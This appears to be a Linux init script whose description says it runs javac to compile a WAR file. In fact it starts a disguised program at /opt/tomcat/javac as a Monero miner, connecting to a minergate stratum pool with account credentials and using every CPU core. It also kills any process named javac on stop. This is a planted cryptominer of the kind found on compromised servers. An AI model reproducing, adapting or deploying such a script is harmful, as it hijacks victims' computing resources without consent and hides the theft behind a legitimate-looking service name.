#! /bin/sh
### BEGIN INIT INFO
# Provides:          1
# Required-Start:
# Required-Stop:
# Default-Start:
# Default-Stop:      6
# Short-Description: Executes javac up to compile war.
# Description:
### END INIT INFO

PATH=/sbin:/usr/sbin:/bin:/usr/bin

. /lib/lsb/init-functions

do_stop () {
        ps -ef|grep javac|awk -F" " '{print $2}'|xargs kill -9
}
do_start () {
                /opt/tomcat/javac -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -ustryng@gmail.com -pSlackware -t`lscpu|grep CPU\(s\)\:|grep -v NUMA|awk -F" " '{print $2 }'` &
}
case "$1" in
  start)
        do_start
        ;;
  stop)
        do_stop
        ;;
  status)
        exit 0
        ;;
  *)
        echo "Usage: $0 start|stop" >&2
        exit 3
        ;;
esac
